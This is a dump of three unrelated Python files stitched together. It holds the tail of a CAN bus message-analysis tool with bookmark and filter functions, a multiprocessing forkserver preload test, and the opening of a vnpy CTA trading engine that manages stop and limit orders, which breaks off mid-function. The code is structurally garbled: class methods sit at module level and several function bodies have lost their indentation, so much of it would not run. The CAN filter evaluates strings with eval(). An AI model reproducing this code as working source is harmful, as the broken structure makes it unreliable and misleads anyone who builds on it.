    out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
    return '\n'.join(out)
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
    '''
    Save a named bookmark (with optional comment).
    This stores the message index number from the
    CMD_ISO_RECV mailbox.

    This also places a bookmark in the normal CAN message
    stream.

    DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!

    Returns the new isolation-side bookmark index.
    '''
    mbox = self._messages.get(CMD_ISO_RECV)
    if mbox == None:
        msg_index = 0
    else:
        msg_index = len(mbox)
    bkmk_index = len(self.bookmarks_iso)
    self.bookmarks_iso.append(msg_index)
    info = { 'name' : name,
             'comment' : comment }
    self.bookmark_info_iso[bkmk_index] = info #should this be msg_index? benefit either way?
    # also record the bookmark on the normal (vehicle-side) stream
    CanInterface.placeCanBookmark(self, name=name, comment=comment)
    return bkmk_index
def getMsgIndexFromBookmarkIso(self, bkmk_index):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    # Map an isolation-side bookmark index to the message index it marks.
    return self.bookmarks_iso[bkmk_index]
def getBookmarkFromMsgIndexIso(self, msg_index):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Reverse lookup: find which isolation-side bookmark marks msg_index.
    Raises ValueError if no bookmark points at that index.
    '''
    return self.bookmarks_iso.index(msg_index)
def setCanBookmarkNameIso(self, bkmk_index, name):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Rename an isolation-side bookmark.
    '''
    info = self.bookmark_info_iso[bkmk_index]
    # BUG fix: original did info[name] = name, keying the dict on the new
    # name value instead of updating the 'name' field
    info['name'] = name
def setCanBookmarkCommentIso(self, bkmk_index, comment):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Set/replace the comment on an isolation-side bookmark.
    '''
    info = self.bookmark_info_iso[bkmk_index]
    # BUG fix: original did info[name] = name, referencing an undefined
    # 'name' (NameError) and never storing the comment
    info['comment'] = comment
def setCanBookmarkNameByMsgIndexIso(self, msg_index, name):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Rename the isolation-side bookmark that marks msg_index.
    '''
    bkmk_index = self.bookmarks_iso.index(msg_index)
    info = self.bookmark_info_iso[bkmk_index]
    # BUG fix: original did info[name] = name instead of updating 'name'
    info['name'] = name
def setCanBookmarkCommentByMsgIndexIso(self, msg_index, comment):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Set/replace the comment on the isolation-side bookmark that marks msg_index.
    '''
    bkmk_index = self.bookmarks_iso.index(msg_index)
    info = self.bookmark_info_iso[bkmk_index]
    # BUG fix: original did info[name] = name (undefined 'name', and the
    # comment argument was never stored)
    info['comment'] = comment
def snapshotCanMessagesIso(self, name=None, comment=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Save bookmarks at the start and end of some event you are about to do
    Bookmarks are named "Start_" + name and "Stop_" + name

    DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
    '''
    # BUG fix: the original called self.placeCanBookmarkIso(), which is not
    # defined anywhere in this class; placeCanBookmark() is overridden here
    # to record both the isolation-side and vehicle-side bookmarks.
    start_bkmk = self.placeCanBookmark("Start_" + name, comment)
    raw_input("Press Enter When Done...")
    stop_bkmk = self.placeCanBookmark("Stop_" + name, comment)
def filterCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
                               arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Translate isolation-side bookmark indexes into message indexes and
    delegate to filterCanMsgsIso().  None on either side means unbounded.
    '''
    if start_bkmk != None:
        start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
    else:
        start_msg = 0
    if stop_bkmk != None:
        stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
    else:
        # BUG fix: original assigned 'stop_bkmk = -1' here, leaving stop_msg
        # unbound (NameError).  None means "through the end" downstream.
        stop_msg = None
    if start_baseline_bkmk != None:
        start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
    else:
        start_baseline_msg = None
    if stop_baseline_bkmk != None:
        stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
    else:
        stop_baseline_msg = None
    return self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def filterCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Iso means the second CAN bus (M2's and DUE_CAN models have two CAN interfaces)
    returns the received CAN messages between indexes "start_msg" and "stop_msg"
    but only messages to ID's that *do not* appear in the the baseline indicated
    by "start_baseline_msg" and "stop_baseline_msg".

    for message indexes, you *will* want to look into the bookmarking subsystem!
    '''
    self.log("starting filtering messages...")
    if stop_baseline_msg != None:
        self.log("ignoring arbids from baseline...")
        # get a list of baseline arbids.
        # BUG fixes: the generator yields (idx, ts, arbid, data) 4-tuples
        # (the original unpacked 3) and the baseline for the isolation
        # stream must come from genCanMsgsIso, not genCanMsgs.
        filter_ids = { arbid:1 for idx, ts, arbid, data in self.genCanMsgsIso(start_baseline_msg, stop_baseline_msg)
                       }.keys()
    else:
        filter_ids = None
    self.log("filtering messages...")
    # only wrap a single arbid; the original wrapped None into [None],
    # which filtered out every message on the default call
    if arbids != None and type(arbids) != list:
        arbids = [arbids]
    for idx, ts, arbid, msg in self.genCanMsgsIso(start_msg, stop_msg, arbids=arbids):
        if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids == None or arbid not in filter_ids)):
            continue
        # advanced filters allow python code to be handed in.  if any of the python code snippits result in "False" or 0, skip this message
        # NOTE(review): snippets are eval()'d -- only ever pass trusted filter strings
        skip = False
        for advf in advfilters:
            # consistency fix: sibling filterCanMsgs uses self._getLocals;
            # self._locals does not exist
            lcls = self._getLocals(idx, ts, arbid, msg)
            if not eval(advf, lcls):
                skip = True
        if skip:
            continue
        yield (idx, ts, arbid, msg)
def printCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
                              arbids=None, ignore=[], advfilters=[]):
    '''
    Print the isolation-side messages between two bookmarks.

    deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
    '''
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    print self.reprCanMsgsByBookmarkIso(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters)
def reprCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Translate isolation-side bookmark indexes into message indexes and
    delegate to reprCanMsgsIso().

    deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
    '''
    if start_bkmk != None:
        start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
    else:
        start_msg = 0
    if stop_bkmk != None:
        stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
    else:
        # BUG fix: original assigned 'stop_bkmk = -1' here, leaving stop_msg
        # unbound (NameError).  None means "through the end" downstream.
        stop_msg = None
    if start_baseline_bkmk != None:
        start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
    else:
        start_baseline_msg = None
    if stop_baseline_bkmk != None:
        stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
    else:
        stop_baseline_msg = None
    return self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    # Print the isolation-side messages between two message indexes (Python 2 print statement).
    print self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def reprCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    String representation of a set of CAN Messages.
    These can be filtered by start and stop message indexes, as well as
    use a baseline (defined by start/stop message indexes),
    by a list of "desired" arbids as well as a list of
    ignored arbids

    Many functions wrap this one.
    '''
    # BUG fix: the final parameter was misspelled 'adfilters' while the body
    # and callers (e.g. printCanSessionsIso) use 'advfilters', which raised
    # NameError here and TypeError at the call sites.
    out = []
    if start_msg in self.bookmarks_iso:
        bkmk = self.bookmarks_iso.index(start_msg)
        out.append("starting from bookmark %d: '%s'" %
                   (bkmk,
                    self.bookmark_info_iso[bkmk].get('name'))
                   )
    if stop_msg in self.bookmarks_iso:
        bkmk = self.bookmarks_iso.index(stop_msg)
        out.append("stoppng at bookmark %d: '%s'" %
                   (bkmk,
                    self.bookmark_info_iso[bkmk].get('name'))
                   )
    last_msg = None
    next_bkmk = 0
    next_bkmk_idx = 0
    msg_count = 0
    last_ts = None
    tot_delta_ts = 0
    counted_msgs = 0    # used for calculating averages, excluding outliers
    data_delta = None
    data_repeat = 0
    data_similar = 0
    for idx, ts, arbid, msg in self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters):
        diff = []
        # insert bookmark names/comments in appropriate places
        while next_bkmk_idx < len(self.bookmarks_iso) and idx >= self.bookmarks_iso[next_bkmk_idx]:
            out.append(self.reprBookmarkIso(next_bkmk_idx))
            next_bkmk_idx += 1
        msg_count += 1
        # check data: count payload bytes changed since the previous message
        byte_cnt_diff = 0
        if last_msg != None:
            if len(last_msg) == len(msg):
                for bidx in range(len(msg)):
                    if last_msg[bidx] != msg[bidx]:
                        byte_cnt_diff += 1
                if byte_cnt_diff == 0:
                    diff.append("REPEAT")
                    data_repeat += 1
                elif byte_cnt_diff <= 4:
                    diff.append("Similar")
                    data_similar += 1
                # FIXME: make some better heuristic to identify "out of norm"
        # look for ASCII data (4+ consecutive bytes)
        if hasAscii(msg):
            diff.append("ASCII: %s" % repr(msg))
        # calculate timestamp delta and comment if out of whack
        if last_ts == None:
            last_ts = ts
        delta_ts = ts - last_ts
        if counted_msgs:
            avg_delta_ts = tot_delta_ts / counted_msgs
        else:
            avg_delta_ts = delta_ts
        if abs(delta_ts - avg_delta_ts) <= delta_ts:
            tot_delta_ts += delta_ts
            counted_msgs += 1
        else:
            diff.append("TS_delta: %.3f" % delta_ts)
        out.append(reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff)))
        last_ts = ts
        last_msg = msg
    out.append("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
    return "\n".join(out)
def printCanSessionsIso(self, arbid_list=None, advfilters=[]):
    '''
    Split CAN messages into Arbitration ID's and prints entire
    sessions for each CAN id.
    Defaults to printing by least number of messages, including all IDs
    Or... provide your own list of ArbIDs in whatever order you like
    '''
    if arbid_list == None:
        arbids = self.getArbitrationIdsIso()
    else:
        # getArbitrationIdsIso() returns (count, arbid, msgs); keep only requested ids
        arbids = [arbdata for arbdata in self.getArbitrationIdsIso() if arbdata[1] in arbid_list]
    for datalen, arbid, msgs in arbids:
        print self.reprCanMsgsIso(arbids=[arbid], advfilters=advfilters)
        raw_input("\nPress Enter to review the next Session...")
        print
def printBookmarksIso(self):
    '''
    Print out the list of current Bookmarks and where they sit
    '''
    print(self.reprBookmarksIso())
def printAsciiStringsIso(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgsIso():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print reprCanMsgIso(idx, ts, arbid, msg, repr(msg))
def reprBookmarksIso(self):
    '''
    Build the newline-joined string representation of every
    isolation-side bookmark.
    '''
    reprs = [self.reprBookmarkIso(bid) for bid in range(len(self.bookmarks_iso))]
    return '\n'.join(reprs)
def reprBookmarkIso(self, bid):
    '''
    get a string representation of one bookmark

    Mirrors CanInterface.reprBookmark(), using the isolation-side lists.
    '''
    msgidx = self.bookmarks_iso[bid]
    info = self.bookmark_info_iso.get(bid)
    comment = info.get('comment')
    if comment == None:
        return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
    # BUG fix: the original had no return for the commented case and
    # silently returned None; format mirrors the base-class version.
    return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s \tcomment: %s" % (bid, msgidx, info.get('name'), comment)
def restoreSession(self, me, force=False):
    '''
    Load a previous analysis session from a python dictionary object
    see: saveSession()

    Refuses to clobber a live serial session unless force=True.
    '''
    if isinstance(self._io, serial.Serial) and force == False:
        print("Refusing to reload a session while active session!  use 'force=True' option")
        return
    self._messages = me.get('messages')
    self.bookmarks = me.get('bookmarks')
    self.bookmark_info = me.get('bookmark_info')
    self.comments = me.get('comments')
    # isolation-side state saved by this subclass's saveSession()
    self.bookmarks_iso = me.get('bookmarks_iso')
    self.bookmark_info_iso = me.get('bookmark_info_iso')
def saveSession(self):
    '''
    Save the current analysis session to a python dictionary object
    What you do with it form there is your own business.
    This function is called by saveSessionToFile() to get the data
    to save to the file.
    '''
    savegame = {}
    savegame['messages'] = self._messages
    savegame['bookmarks'] = self.bookmarks
    savegame['bookmark_info'] = self.bookmark_info
    savegame['bookmarks_iso'] = self.bookmarks_iso
    savegame['bookmark_info_iso'] = self.bookmark_info_iso
    savegame['comments'] = self.comments
    return savegame
######### administrative, supporting code ##########
# module-level registry of live interface objects, torn down at exit
cs = []

def cleanupInteractiveAtExit():
    '''
    Best-effort teardown of every tracked interface at interpreter exit;
    errors from individual destructors are deliberately swallowed.
    '''
    global cs
    for iface in cs:
        try:
            iface.__del__()
        except:
            pass
# candidate device nodes, in probe order (Linux CDC-ACM first, then macOS).
# (fix: the original listed '/dev/ttyACM0' twice; the duplicate was harmless
# but redundant, since the first match wins.)
devlocs = [
    '/dev/ttyACM0',
    '/dev/ttyACM1',
    '/dev/ttyACM2',
    '/dev/tty.usbmodem1411',
    '/dev/tty.usbmodem1421',
    '/dev/tty.usbmodem1431',
]

def getDeviceFile():
    '''
    Return the first existing candidate device path, or None if none exist.
    '''
    for devloc in devlocs:
        if os.path.exists(devloc):
            return devloc
def interactive(port=None, InterfaceClass=CanInterface, intro='', load_filename=None, can_baud=None):
    '''
    Construct an interface (bound to the module-level global 'c') and drop
    into an interactive shell with it in scope.  Tries three generations of
    the IPython embedding API (oldest first), finally falling back to the
    stdlib code.InteractiveConsole.  Python 2 only ('except X, e' syntax).
    '''
    global c
    import atexit
    c = InterfaceClass(port=port, load_filename=load_filename)
    atexit.register(cleanupInteractiveAtExit)
    # when replaying a saved session there is no hardware to configure
    if load_filename is None:
        if can_baud != None:
            c.setCanBaud(can_baud)
        else:
            c.setCanBaud(CAN_500KBPS)
    gbls = globals()
    lcls = locals()
    try:
        # pre-0.11 IPython API
        import IPython.Shell
        ipsh = IPython.Shell.IPShell(argv=[''], user_ns=lcls, user_global_ns=gbls)
        print intro
        ipsh.mainloop(intro)
    except ImportError, e:
        try:
            # modern IPython layout
            from IPython.terminal.interactiveshell import TerminalInteractiveShell
            ipsh = TerminalInteractiveShell()
            ipsh.user_global_ns.update(gbls)
            ipsh.user_global_ns.update(lcls)
            ipsh.autocall = 2       # don't require parenthesis around *everything*.  be smart!
            ipsh.mainloop(intro)
        except ImportError, e:
            try:
                # intermediate (0.11-0.x "frontend") IPython layout
                from IPython.frontend.terminal.interactiveshell import TerminalInteractiveShell
                ipsh = TerminalInteractiveShell()
                ipsh.user_global_ns.update(gbls)
                ipsh.user_global_ns.update(lcls)
                ipsh.autocall = 2       # don't require parenthesis around *everything*.  be smart!
                ipsh.mainloop(intro)
            except ImportError, e:
                print e
                # no IPython at all: plain stdlib console
                shell = code.InteractiveConsole(gbls)
                shell.interact(intro)
|
mp_preload.py | import multiprocessing as multiprocess
# Acquireable state created at import time; exercised when the forkserver
# preloads this module.
multiprocess.Lock()

def f():
    # trivial child-process target
    print("ok")

if __name__ == "__main__":
    ctx = multiprocess.get_context("forkserver")
    modname = "test.mp_preload"
    # Make sure it's importable
    __import__(modname)
    # preload this module in the forkserver before spawning the child
    ctx.set_forkserver_preload([modname])
    proc = ctx.Process(target=f)
    proc.start()
    proc.join()
|
engine.py | """"""
import importlib
import os
import traceback
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable
from datetime import datetime, timedelta
from threading import Thread
from queue import Queue
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
OrderRequest,
SubscribeRequest,
HistoryRequest,
LogData,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION
)
from vnpy.trader.constant import (
Direction,
OrderType,
Interval,
Exchange,
Offset,
Status
)
from vnpy.trader.utility import load_json, save_json, extract_vt_symbol, round_to
from vnpy.trader.database import database_manager
from vnpy.trader.rqdata import rqdata_client
from .base import (
APP_NAME,
EVENT_CTA_LOG,
EVENT_CTA_STRATEGY,
EVENT_CTA_STOPORDER,
EngineType,
StopOrder,
StopOrderStatus,
STOPORDER_PREFIX
)
from .template import CtaTemplate
from .converter import OffsetConverter
# Map gateway order statuses onto the stop-order lifecycle states used by
# this engine (submitting/untraded -> waiting; any fill -> triggered;
# cancelled/rejected -> cancelled).
STOP_STATUS_MAP = {
    Status.SUBMITTING: StopOrderStatus.WAITING,
    Status.NOTTRADED: StopOrderStatus.WAITING,
    Status.PARTTRADED: StopOrderStatus.TRIGGERED,
    Status.ALLTRADED: StopOrderStatus.TRIGGERED,
    Status.CANCELLED: StopOrderStatus.CANCELLED,
    Status.REJECTED: StopOrderStatus.CANCELLED
}
class CtaEngine(BaseEngine):
    """CTA strategy engine: loads strategy classes, routes market/order/trade
    events to strategies, and manages local (engine-side) stop orders."""

    engine_type = EngineType.LIVE  # live trading engine

    setting_filename = "cta_strategy_setting.json"
    data_filename = "cta_strategy_data.json"

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Initialize bookkeeping maps; no I/O happens until init_engine()."""
        super(CtaEngine, self).__init__(
            main_engine, event_engine, APP_NAME)

        self.strategy_setting = {}  # strategy_name: dict
        self.strategy_data = {}     # strategy_name: dict

        self.classes = {}           # class_name: strategy_class
        self.strategies = {}        # strategy_name: strategy

        self.symbol_strategy_map = defaultdict(
            list)                   # vt_symbol: strategy list
        self.orderid_strategy_map = {}  # vt_orderid: strategy
        self.strategy_orderid_map = defaultdict(
            set)                    # strategy_name: orderid list

        self.stop_order_count = 0   # for generating stop_orderid
        self.stop_orders = {}       # stop_orderid: stop_order

        self.init_thread = None
        self.init_queue = Queue()

        self.rq_client = None
        self.rq_symbols = set()

        self.vt_tradeids = set()    # for filtering duplicate trade

        self.offset_converter = OffsetConverter(self.main_engine)
def init_engine(self):
    """
    Bring the engine online: connect the data client, load strategy
    classes/settings/data from disk, and register event handlers.
    """
    self.init_rqdata()
    self.load_strategy_class()
    self.load_strategy_setting()
    self.load_strategy_data()
    self.register_event()
    self.write_log("CTA策略引擎初始化成功")
def close(self):
    """
    Shut the engine down by stopping every running strategy.
    """
    self.stop_all_strategies()
    # BUG fix: the original also called self.init_engine() here, which
    # re-registered event handlers and reloaded strategy classes/settings
    # in the middle of shutdown.
def register_event(self):
    """Subscribe this engine's handlers to tick/order/trade/position events."""
    self.event_engine.register(EVENT_TICK, self.process_tick_event)
    self.event_engine.register(EVENT_ORDER, self.process_order_event)
    self.event_engine.register(EVENT_TRADE, self.process_trade_event)
    self.event_engine.register(EVENT_POSITION, self.process_position_event)
def init_rqdata(self):
    """
    Init RQData client.

    Logs on success; a falsy result (failed init) is silently ignored.
    """
    result = rqdata_client.init()
    if result:
        self.write_log("RQData数据接口初始化成功")
def query_bar_from_rq(
    self, symbol: str, exchange: Exchange, interval: Interval, start: datetime, end: datetime
):
    """
    Query bar data from RQData.

    Builds a HistoryRequest for the given contract/interval/window and
    returns whatever the RQData client yields for it.
    """
    request = HistoryRequest(
        symbol=symbol,
        exchange=exchange,
        interval=interval,
        start=start,
        end=end
    )
    return rqdata_client.query_history(request)
def process_tick_event(self, event: Event):
    """Dispatch a tick: first trigger any matching local stop orders, then
    forward the tick to every initialized strategy subscribed to the symbol."""
    tick = event.data

    strategies = self.symbol_strategy_map[tick.vt_symbol]
    if not strategies:
        return

    # local (engine-side) stop orders are checked against every tick
    self.check_stop_order(tick)

    for strategy in strategies:
        if strategy.inited:
            self.call_strategy_func(strategy, strategy.on_tick, tick)
def process_order_event(self, event: Event):
    """Route an order update to its owning strategy, pruning finished orders
    and translating server-side STOP orders into StopOrder callbacks."""
    order = event.data

    self.offset_converter.update_order(order)

    strategy = self.orderid_strategy_map.get(order.vt_orderid, None)
    if not strategy:
        return

    # Remove vt_orderid if order is no longer active.
    vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
    if order.vt_orderid in vt_orderids and not order.is_active():
        vt_orderids.remove(order.vt_orderid)

    # For server stop order, call strategy on_stop_order function
    if order.type == OrderType.STOP:
        so = StopOrder(
            vt_symbol=order.vt_symbol,
            direction=order.direction,
            offset=order.offset,
            price=order.price,
            volume=order.volume,
            stop_orderid=order.vt_orderid,
            strategy_name=strategy.strategy_name,
            status=STOP_STATUS_MAP[order.status],
            vt_orderids=[order.vt_orderid],
        )
        self.call_strategy_func(strategy, strategy.on_stop_order, so)

    # Call strategy on_order function
    self.call_strategy_func(strategy, strategy.on_order, order)
def process_trade_event(self, event: Event):
    """Apply a fill to its strategy: dedupe, update position, notify the
    strategy, then persist its variables and refresh the UI."""
    trade = event.data

    # Filter duplicate trade push
    if trade.vt_tradeid in self.vt_tradeids:
        return
    self.vt_tradeids.add(trade.vt_tradeid)

    self.offset_converter.update_trade(trade)

    strategy = self.orderid_strategy_map.get(trade.vt_orderid, None)
    if not strategy:
        return

    # Update strategy pos before calling on_trade method
    if trade.direction == Direction.LONG:
        strategy.pos += trade.volume
    else:
        strategy.pos -= trade.volume

    self.call_strategy_func(strategy, strategy.on_trade, trade)

    # Sync strategy variables to data file
    self.sync_strategy_data(strategy)

    # Update GUI
    self.put_strategy_event(strategy)
def process_position_event(self, event: Event):
""""""
position = event.data
self.offset_converter.update_position(position)
    def check_stop_order(self, tick: TickData):
        """
        Check every local stop order against a new tick and fire the ones
        whose trigger price has been crossed, converting them into server
        limit orders.
        """
        # Iterate over a snapshot: triggered stop orders are popped below.
        for stop_order in list(self.stop_orders.values()):
            if stop_order.vt_symbol != tick.vt_symbol:
                continue
            # A long stop triggers when price rises to/through the stop
            # level; a short stop when price falls to/through it.
            long_triggered = (
                stop_order.direction == Direction.LONG and tick.last_price >= stop_order.price
            )
            short_triggered = (
                stop_order.direction == Direction.SHORT and tick.last_price <= stop_order.price
            )
            if long_triggered or short_triggered:
                strategy = self.strategies[stop_order.strategy_name]
                # To get executed immediately after stop order is
                # triggered, use limit price if available, otherwise
                # use ask_price_5 or bid_price_5
                if stop_order.direction == Direction.LONG:
                    if tick.limit_up:
                        price = tick.limit_up
                    else:
                        price = tick.ask_price_5
                else:
                    if tick.limit_down:
                        price = tick.limit_down
                    else:
                        price = tick.bid_price_5
                contract = self.main_engine.get_contract(stop_order.vt_symbol)
                vt_orderids = self.send_limit_order(
                    strategy,
                    contract,
                    stop_order.direction,
                    stop_order.offset,
                    price,
                    stop_order.volume,
                    stop_order.lock
                )
                # Update stop order status if placed successfully
                if vt_orderids:
                    # Remove from relation map.
                    self.stop_orders.pop(stop_order.stop_orderid)
                    strategy_vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
                    if stop_order.stop_orderid in strategy_vt_orderids:
                        strategy_vt_orderids.remove(stop_order.stop_orderid)
                    # Change stop order status to TRIGGERED and update to strategy.
                    stop_order.status = StopOrderStatus.TRIGGERED
                    stop_order.vt_orderids = vt_orderids
                    self.call_strategy_func(
                        strategy, strategy.on_stop_order, stop_order
                    )
                    self.put_stop_order_event(stop_order)
    def send_server_order(
        self,
        strategy: CtaTemplate,
        contract: ContractData,
        direction: Direction,
        offset: Offset,
        price: float,
        volume: float,
        type: OrderType,
        lock: bool
    ):
        """
        Send a new order to server.

        The original request may be split into several requests by the
        offset converter (e.g. lock mode, today/yesterday positions);
        one vt_orderid is collected per request actually sent.

        :return: list of vt_orderid strings for the sent requests.
        """
        # NOTE(review): parameter name `type` shadows the builtin; kept
        # unchanged for caller compatibility.
        # Create request and send order.
        original_req = OrderRequest(
            symbol=contract.symbol,
            exchange=contract.exchange,
            direction=direction,
            offset=offset,
            type=type,
            price=price,
            volume=volume,
        )
        # Convert with offset converter
        req_list = self.offset_converter.convert_order_request(original_req, lock)
        # Send Orders
        vt_orderids = []
        for req in req_list:
            vt_orderid = self.main_engine.send_order(
                req, contract.gateway_name)
            vt_orderids.append(vt_orderid)
            self.offset_converter.update_order_request(req, vt_orderid)
            # Save relationship between orderid and strategy.
            self.orderid_strategy_map[vt_orderid] = strategy
            self.strategy_orderid_map[strategy.strategy_name].add(vt_orderid)
        return vt_orderids
def send_limit_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a limit order to server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.LIMIT,
lock
)
def send_server_stop_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a stop order to server.
Should only be used if stop order supported
on the trading server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.STOP,
lock
)
    def send_local_stop_order(
        self,
        strategy: CtaTemplate,
        direction: Direction,
        offset: Offset,
        price: float,
        volume: float,
        lock: bool
    ):
        """
        Create a new local stop order.

        The stop order is held inside the engine (never sent to the server)
        and converted into a limit order by check_stop_order once a tick
        crosses its trigger price.

        :return: the generated stop_orderid (prefixed with STOPORDER_PREFIX).
        """
        self.stop_order_count += 1
        stop_orderid = f"{STOPORDER_PREFIX}.{self.stop_order_count}"
        stop_order = StopOrder(
            vt_symbol=strategy.vt_symbol,
            direction=direction,
            offset=offset,
            price=price,
            volume=volume,
            stop_orderid=stop_orderid,
            strategy_name=strategy.strategy_name,
            lock=lock
        )
        self.stop_orders[stop_orderid] = stop_order
        # Track the stop orderid as an active order of the strategy.
        vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
        vt_orderids.add(stop_orderid)
        self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
        self.put_stop_order_event(stop_order)
        return stop_orderid
def cancel_server_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
Cancel existing order by vt_orderid.
"""
order = self.main_engine.get_order(vt_orderid)
if not order:
self.write_log(f"撤单失败,找不到委托{vt_orderid}", strategy)
return
req = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
    def cancel_local_stop_order(self, strategy: CtaTemplate, stop_orderid: str):
        """
        Cancel a local stop order.

        NOTE(review): the incoming `strategy` argument is effectively
        ignored — the owner is re-derived from the stop order below.
        """
        stop_order = self.stop_orders.get(stop_orderid, None)
        if not stop_order:
            return
        # Overwrites the incoming argument with the recorded owner.
        strategy = self.strategies[stop_order.strategy_name]
        # Remove from relation map.
        self.stop_orders.pop(stop_orderid)
        vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
        if stop_orderid in vt_orderids:
            vt_orderids.remove(stop_orderid)
        # Change stop order status to cancelled and update to strategy.
        stop_order.status = StopOrderStatus.CANCELLED
        self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
        self.put_stop_order_event(stop_order)
def send_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool,
lock: bool
):
"""
"""
contract = self.main_engine.get_contract(strategy.vt_symbol)
if not contract:
self.write_log(f"委托失败,找不到合约:{strategy.vt_symbol}", strategy)
return ""
# Round order price and volume to nearest incremental value
price = round_to(price, contract.pricetick)
volume = round_to(volume, contract.min_volume)
if stop:
if contract.stop_supported:
return self.send_server_stop_order(strategy, contract, direction, offset, price, volume, lock)
else:
return self.send_local_stop_order(strategy, direction, offset, price, volume, lock)
else:
return self.send_limit_order(strategy, contract, direction, offset, price, volume, lock)
def cancel_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
"""
if vt_orderid.startswith(STOPORDER_PREFIX):
self.cancel_local_stop_order(strategy, vt_orderid)
else:
self.cancel_server_order(strategy, vt_orderid)
def cancel_all(self, strategy: CtaTemplate):
"""
Cancel all active orders of a strategy.
"""
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if not vt_orderids:
return
for vt_orderid in copy(vt_orderids):
self.cancel_order(strategy, vt_orderid)
def get_engine_type(self):
""""""
return self.engine_type
def load_bar(
self,
vt_symbol: str,
days: int,
interval: Interval,
callback: Callable[[BarData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
# Query bars from RQData by default, if not found, load from database.
bars = self.query_bar_from_rq(symbol, exchange, interval, start, end)
if not bars:
